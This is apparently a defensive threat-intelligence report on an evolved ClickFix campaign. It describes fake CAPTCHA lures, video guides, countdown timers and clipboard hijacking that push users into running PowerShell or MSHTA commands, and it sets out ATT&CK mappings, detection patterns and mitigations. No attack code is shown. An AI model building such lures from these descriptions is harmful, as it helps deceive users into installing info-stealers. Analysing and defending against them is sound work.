Full Report
ClickFix attacks have evolved to feature videos that guide victims through the self-infection process, a timer to pressure targets into taking risky actions, and automatic detection of the operating system to provide the correct commands. [...]
Analysis Summary
# Tool/Technique: ClickFix Attacks (Evolved Campaign)
## Overview
ClickFix attacks are social-engineering driven campaigns where threat actors trick victims into pasting and executing malicious code or commands on their systems, often disguised as verification or software troubleshooting steps. Recent evolution introduces multimedia content (videos) and automated functions to increase pressure and reduce human error during execution. The typical goal is to deploy an information stealer payload.
## Technical Details
- Type: Technique (Social Engineering combined with multi-stage execution payload delivery)
- Platform: Multiple Operating Systems (Windows, macOS, Linux)
- Capabilities: OS detection, automated command copying, video-guided infection process, time-based pressure.
- First Seen: Not explicitly stated for the initial concept, but modern evolution noted in November 2025 research.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.004 - Phishing: Phishing via Social Media (If delivered via compromised legitimate sites or SEO poisoning)
- **TA0002 - Execution**
- T1204 - User Execution
- T1204.002 - User Execution: Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- **TA0005 - Defense Evasion**
- T1216 - Signed Binary Proxy Execution (Implied by use of MSHTA/PowerShell)
## Functionality
### Core Capabilities
- **Social Engineering:** Tricking users via fake CAPTCHA challenges (e.g., using a fake Cloudflare CAPTCHA disguise).
- **Payload Delivery via Web:** Utilizing malicious JavaScript embedded on compromised websites or SEO-poisoned sites to execute the attack chain.
- **Multi-OS Support:** Automatically detecting the victim's Operating System (Windows, macOS, Linux) to deliver tailored, correct commands for execution.
### Advanced Features
- **Video Tutorials:** Embedding videos to guide victims step-by-step through the self-infection process, making the malicious sequence appear legitimate.
- **Clipboard Automation:** Using JavaScript to automatically hide commands and copy them directly to the user's clipboard, minimizing manual entry and potential user mistakes.
- **Pressure Tactics:** Implementing a one-minute countdown timer to rush the victim into executing commands without proper verification.
- **Deception Counter:** Displaying a fake "users verified in the last hour" counter to simulate legitimacy.
- **Living-off-the-Land (LotL) Payloads:** Delivering subsequent payloads utilizing native binaries like `MSHTA` on Windows and PowerShell scripts.
## Indicators of Compromise
- File Hashes: Not provided in the context.
- File Names: Not provided in the context, but payloads use system tools like `MSHTA` and PowerShell scripts.
- Registry Keys: Not provided in the context.
- Network Indicators: Initial infection vector utilizes malvertising on Google Search, leading to compromised websites or SEO-poisoned sites hosting the malicious JavaScript. Specific C2 domains are not detailed.
- Behavioral Indicators: User interaction involving copying and pasting commands into a terminal/command prompt, often preceded by viewing a video tutorial under time pressure. Execution of native binaries like PowerShell or MSHTA in response to web interaction.
## Associated Threat Actors
- Unspecified threat actors; the campaign is described as an evolving method utilized by attackers.
## Detection Methods
- **Signature-based detection:** Potential for signatures targeting the specific JavaScript used for OS detection or clipboard manipulation.
- **Behavioral detection:** Monitoring for user execution of terminal commands initiated immediately following web browsing sessions, especially if clipboard contents are piped directly into execution environments (powershell.exe, cmd.exe). Monitoring unusual execution of LotL binaries like MSHTA triggered by web content.
- **YARA rules if available:** Not provided in the context.
## Mitigation Strategies
- **Prevention:** Never execute commands pasted from untrusted web pages, especially when prompted by verification windows or CAPTCHAs.
- **Hardening:** Implement robust Endpoint Detection and Response (EDR) solutions capable of detecting anomalous execution chains originating from web browsers or scripts. Restrict the use of high-privilege command-line tools like PowerShell for standard user operations where possible.
- **User Education:** Train users to recognize urgency tactics (like timers) and suspicious requests to execute terminal commands as part of any online process.
## Related Tools/Techniques
- PowerShell execution used in initial access.
- Information Stealers (as the typical final payload).
- Past ClickFix variants that relied exclusively on text instructions.